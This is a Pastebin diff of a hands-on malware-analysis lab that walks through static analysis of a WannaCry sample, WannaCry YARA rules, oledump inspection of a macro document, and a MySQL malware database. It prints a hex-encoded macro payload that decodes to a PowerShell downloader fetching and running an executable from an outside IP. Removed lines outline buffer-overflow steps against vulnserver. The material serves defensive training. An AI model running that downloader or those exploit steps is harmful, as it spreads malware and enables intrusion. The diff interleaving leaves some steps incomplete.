View difference between Paste ID: <a href="/tU0KkYc7">tU0KkYc7</a> and <a href="/UB868q2s">UB868q2s</a>

############################
1		############################
2	-	# Setup your CentOS 7 host #
2	+	# Download the Analysis VM #
3		############################
4	-	yum update
4	+
5	-	yum install -y nmap python2-scapy.noarch python34-scapy.noarch whois.x86_64 tcpdump.x86_64 unzip wget tcpflow.x86_64
5	+	user: infosecaddicts
6		pass: infosecaddicts
7
8
9
10		- Log in to your Ubuntu system with the username 'infosecaddicts' and the password 'infosecaddicts'.
11
12
13		###################################
14		# Setting up your virtual machine #
15		###################################
16
17		Here is where we will setup all of the required dependencies for the tools we plan to install
18		---------------------------Type This-----------------------------------
19		sudo apt update
20		sudo apt-get install -y python3-pip python3-dev unzip python3-setuptools ipython3 build-essential python-pefile python2.7 python-pip python-setuptools mysql-server python-mysqldb python-mysqldb
21
22
23		sudo pip install -U olefile
24
25
26		git clone https://github.com/Te-k/pe.git
27	-	mkdir malware_analysis
27	+	cd pe
28		sudo python3 setup.py install
29	-	cd malware_analysis
29	+	pip3 install .
30		cd ..
31		wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
32		infected
33		-----------------------------------------------------------------------
34
35
36
37
38		################
39		# The Scenario #
40		################
41		You've come across a file that has been flagged by one of your security products (AV Quarantine, HIPS, Spam Filter, Web Proxy, or digital forensics scripts).
42
43
44		The fastest thing you can do is perform static analysis.
45
46
47
48		###################
49		# Static Analysis #
50		###################
51
52		- After logging please open a terminal window and type the following commands:
53
54
55		---------------------------Type This-----------------------------------
56		cd ~
57
58		mkdir static_analysis
59
60		cd static_analysis
61	-	strings --all wannacry.exe \| head -n 6
61	+
62		wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
63
64		unzip wannacry.zip
65		infected
66
67		file wannacry.exe
68
69		mv wannacry.exe malware.pdf
70
71		file malware.pdf
72
73		mv malware.pdf wannacry.exe
74
75		hexdump -n 2 -C wannacry.exe
76
77		----------------------------------------------------------------------
78
79
80		*What is '4d 5a' or 'MZ'*
81		Reference:
82		http://www.garykessler.net/library/file_sigs.html
83
84
85
86
87		---------------------------Type This-----------------------------------
88		objdump -x wannacry.exe
89
90		strings wannacry.exe
91
92		strings wannacry.exe \| grep -i dll
93
94		strings wannacry.exe \| grep -i library
95
96		strings wannacry.exe \| grep -i reg
97
98		strings wannacry.exe \| grep -i key
99
100		strings wannacry.exe \| grep -i rsa
101
102		strings wannacry.exe \| grep -i open
103
104		strings wannacry.exe \| grep -i get
105
106		strings wannacry.exe \| grep -i mutex
107
108		strings wannacry.exe \| grep -i irc
109
110		strings wannacry.exe \| grep -i join
111
112		strings wannacry.exe \| grep -i admin
113
114		strings wannacry.exe \| grep -i list
115		----------------------------------------------------------------------
116
117
118
119
120
121		---------------------------Type This-----------------------------------
122		pe info wannacry.exe
123		pe check wannacry.exe
124		pe dump --section text wannacry.exe
125		pe dump --section data wannacry.exe
126		pe dump --section rsrc wannacry.exe
127		pe dump --section reloc wannacry.exe
128		strings rdata \| less
129		strings rsrc \| less
130		strings text \| less
131		----------------------------------------------------------------------
132
133
134
135
136
137
138
139
140		Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
141
142		Quick Google search for "wannacry ransomeware analysis"
143
144
145		Reference
146		https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
147
148		- Yara Rule -
149
150
151		Strings:
152		$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
153		$s2 = “Wanna Decryptor” wide ascii nocase
154		$s3 = “.wcry” wide ascii nocase
155		$s4 = “WANNACRY” wide ascii nocase
156		$s5 = “WANACRY!” wide ascii nocase
157		$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
158
159
160
161
162
163
164
165
166	-	wget https://files.pythonhosted.org/packages/ed/cc/157f20038a80b6a9988abc06c11a4959be8305a0d33b6d21a134127092d4/pefile-2018.8.8.tar.gz
166	+
167	-	tar -zxvf pefile-2018.8.8.tar.gz
167	+
168	-	cd pefile-2018.8.8
168	+
169	-	python setup.py install
169	+
170		strings wannacry.exe \| grep -i ooops
171
172		strings wannacry.exe \| grep -i wanna
173
174		strings wannacry.exe \| grep -i wcry
175
176		strings wannacry.exe \| grep -i wannacry
177
178		strings wannacry.exe \| grep -i wanacry **** Matches $s5, hmmm.....
179		----------------------------------------------------------------------
180
181
182	-	python am.py wannacry.exe
182	+
183
184
185
186
187
188
189
190	-	# Reference: #
190	+
191	-	# https://jon.glass/analyzes-dridex-malware-p1/ #
191	+
192
193
194	-	yum -y install epel-release
194	+
195	-	yum -y install python-pip
195	+
196	-	pip install -U olefile
196	+
197	-
197	+
198		####################################
199	-	mkdir oledump
199	+
200
201	-	cd oledump
201	+
202		https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
203
204		This is a really good script for the basics of static analysis
205
206		Reference:
207		https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
208
209
210		This is really good for showing some good signatures to add to the Python script
211
212
213		Here is my own script using the signatures (started this yesterday, but still needs work):
214		https://pastebin.com/guxzCBmP
215
216
217
218		---------------------------Type This-----------------------------------
219		wget https://pastebin.com/raw/guxzCBmP
220
221
222		mv guxzCBmP am.py
223
224
225		vi am.py
226
227		python2.7 am.py wannacry.exe
228		----------------------------------------------------------------------
229
230
231
232		##############
233		# Yara Ninja #
234		##############
235
236		Reference:
237		https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
238
239		----------------------------------------------------------------------------
240	-	----------------------------------------------------------------------------------------------------------------------------
240	+	rule wannacry_1 : ransom
241	-	##################################
241	+	{
242	-	# PCAP Analysis with ChaosReader #
242	+	meta:
243	-	# Note: run as regular user #
243	+	author = "Joshua Cannell"
244	-	##################################
244	+	description = "WannaCry Ransomware strings"
245		weight = 100
246		date = "2017-05-12"
247
248	-	mkdir -p pcap_analysis/chaos_reader/
248	+	strings:
249		$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
250	-	cd ~/pcap_analysis/chaos_reader/
250	+	$s2 = "Wanna Decryptor" wide ascii nocase
251		$s3 = ".wcry" wide ascii nocase
252	-	wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
252	+	$s4 = "WANNACRY" wide ascii nocase
253		$s5 = "WANACRY!" wide ascii nocase
254	-	wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
254	+	$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
255
256	-	perl chaosreader.pl suspicious-time.pcap
256	+	condition:
257		any of them
258	-	cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)"
258	+	}
259
260	-	cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)" \| awk '{print $4, $5, $6}' \| sort \| uniq -c \| sort -nr
260	+	----------------------------------------------------------------------------
261		rule wannacry_2{
262		meta:
263	-	for i in session_00[0-9]*.http.html; do srcip=`cat "$i" \| grep 'http:\ ' \| awk '{print $2}' \| cut -d ':' -f1`; dstip=`cat "$i" \| grep 'http:\ ' \| awk '{print $4}' \| cut -d ':' -f1`; host=`cat "$i" \| grep 'Host:\ ' \| sort -u \| sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done \| sort -u
263	+	author = "Harold Ogden"
264		description = "WannaCry Ransomware Strings"
265	-	/sbin/iptables -F
265	+	date = "2017-05-12"
266		weight = 100
267	-	python -m SimpleHTTPServer
267	+
268	-	**** Open a web browser and browse the the IP address of your Linux machine port 8000 for the web page ***
268	+	strings:
269		$string1 = "msg/m_bulgarian.wnry"
270	-	------------------------------------------------------------------------
270	+	$string2 = "msg/m_chinese (simplified).wnry"
271	-	###########################
271	+	$string3 = "msg/m_chinese (traditional).wnry"
272	-	# Setting up your machine #
272	+	$string4 = "msg/m_croatian.wnry"
273	-	###########################
273	+	$string5 = "msg/m_czech.wnry"
274		$string6 = "msg/m_danish.wnry"
275		$string7 = "msg/m_dutch.wnry"
276	-	yum -y groupinstall 'Development Tools'
276	+	$string8 = "msg/m_english.wnry"
277	-	yum install -y libpcap-devel.i686 libpcap-devel.x86_64 libpcap.i686 libpcap.x86_64 pcapy.x86_64 p0f.x86_64 perl tcpdump python-docutils git gcc pcre-devel.i686 pcre-devel.x86_64 glibc-static
277	+	$string9 = "msg/m_filipino.wnry"
278		$string10 = "msg/m_finnish.wnry"
279	-	cd ~/pcap_analysis/
279	+	$string11 = "msg/m_french.wnry"
280	-	git clone git://github.com/gamelinux/prads.git
280	+	$string12 = "msg/m_german.wnry"
281	-	cd prads
281	+	$string13 = "msg/m_greek.wnry"
282	-	make
282	+	$string14 = "msg/m_indonesian.wnry"
283	-	make install
283	+	$string15 = "msg/m_italian.wnry"
284		$string16 = "msg/m_japanese.wnry"
285	-	wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
285	+	$string17 = "msg/m_korean.wnry"
286		$string18 = "msg/m_latvian.wnry"
287	-	prads -r suspicious-time.pcap -l prads-asset.log
287	+	$string19 = "msg/m_norwegian.wnry"
288		$string20 = "msg/m_polish.wnry"
289	-	cat prads-asset.log \| less
289	+	$string21 = "msg/m_portuguese.wnry"
290	-	------------------------------------------------------------------------
290	+	$string22 = "msg/m_romanian.wnry"
291		$string23 = "msg/m_russian.wnry"
292		$string24 = "msg/m_slovak.wnry"
293		$string25 = "msg/m_spanish.wnry"
294		$string26 = "msg/m_swedish.wnry"
295		$string27 = "msg/m_turkish.wnry"
296		$string28 = "msg/m_vietnamese.wnry"
297	-	- Step 1: Installing MySQL database
297	+
298	-	- Run the following command in the terminal:
298	+
299		condition:
300	-	yum install -y mariadb-server MySQL-python.x86_64 mysql-connector-python.noarch python2-PyMySQL.noarch mariadb.x86_64 mariadb-devel.x86_64 mariadb-libs.x86_64
300	+	any of ($string*)
301	-	------------------------------------------------------------------------
301	+	}
302	-
302	+	----------------------------------------------------------------------------
303	-	- Step 2: Configure the database to accept large files by adding 'max_allowed_packet = 16M' to the /etc/my.cnf file
303	+
304
305	-	vi /etc/my.cnf
305	+
306	-	max_allowed_packet = 16M
306	+
307	-	------------------------------------------------------------------------
307	+
308
309	-	Step 3: Start MariaDB
309	+
310	-	- Run the following command in the terminal:
310	+
311		# Analyzing Macro Embedded Malware #
312	-	systemctl enable mariadb
312	+
313	-	systemctl start mariadb
313	+
314	-	------------------------------------------------------------------------
314	+	mkdir ~/oledump
315
316	-	Step 4: Logging in
316	+	cd ~/oledump
317
318		wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
319
320		unzip oledump_V0_0_22.zip
321	-	use mysql;
321	+
322	-	update user SET PASSWORD=PASSWORD("malware") WHERE USER='root';
322	+
323	-	flush privileges;
323	+
324		unzip 064016.zip
325	-	grant all on malware.* to 'root' identified by 'malware';
325	+
326
327	-	------------------------------------------------------------------------
327	+
328
329		python oledump.py 064016.doc -s A4 -v
330		-----------------------------------------------------------------------
331	-	Step 5: Configure the database setup script
331	+
332	-	---------------------------Type This-----------------------------------
332	+
333
334		- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
335		- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
336
337		---------------------------Type This-----------------------------------
338	-	------------------------------------------------------------------------
338	+
339		-----------------------------------------------------------------------
340
341	-	Step 6: check it to see if the files table was created
341	+
342	-	--------------------------Type This-----------------------------------
342	+
343		---------------------------Type This-----------------------------------
344		python oledump.py 064016.doc -s A3 -v
345
346		- Look for "GVhkjbjv" and you should see:
347
348		636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
349
350		- Take that long blob that starts with 636D and finishes with 653B and paste it in:
351		http://www.rapidtables.com/convert/number/hex-to-ascii.htm
352		-----------------------------------------------------------------------
353
354
355
356		###############################
357		# Creating a Malware Database #
358		###############################
359	-	Step 7: Now add the malicious file to the DB
359	+
360		-----------------------------------
361		- Step 1: Logging in
362		Run the following command in the terminal:
363		---------------------------Type This-----------------------------------
364		mysql -u root -p (set a password of 'malware')
365
366		- Then create one database by running following command:
367	-	------------------------------------------------------------------------
367	+
368		create database malware;
369
370	-	Step 8: Now check to see if it is in the DB
370	+
371
372		wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
373
374		vi mal_to_db.py (fill in database connection information)
375
376		python mal_to_db.py -i
377
378		------- check it to see if the files table was created ------
379	-	mysql> quit;
379	+
380	-	------------------------------------------------------------------------
380	+
381		malware
382
383	-	-------------------------------------------------
383	+
384	-	1. App Type
384	+
385	-	- Stand Alone
385	+
386	-	- Client Server (*vulnserver.exe*)
386	+
387	-	- Web App
387	+
388
389	-	2. Input Type
389	+
390	-	- Stand Alone File/Keyboard/Mouse
390	+
391	-	- Client Server Logical network port (*9999*)
391	+
392	-	- Web App Browser
392	+
393		---------------------------------
394
395	-	3. Map and fuzz app entry points
395	+
396	-	- Commands, Methods, Verbs, functions, controllers, subroutines
396	+	- Now add the malicious file to the DB
397	-	TRUN 2100
397	+
398		python mal_to_db.py -f wannacry.exe -u
399	-	4. Isolate the crash
399	+
400	-	EIP = 39 6F 43 38
400	+
401	-	9 o C 8
401	+
402		- Now check to see if it is in the DB
403	-	5. Calculate distance to EIP
403	+
404	-	2006
404	+
405		malware
406	-	6. Redirect code execution to mem location you control
406	+
407		mysql> use malware;
408	-	7. Insert payload (shellcode)
408	+
409	-	--------------------------------------------------------------
409	+
410
411		mysql> quit;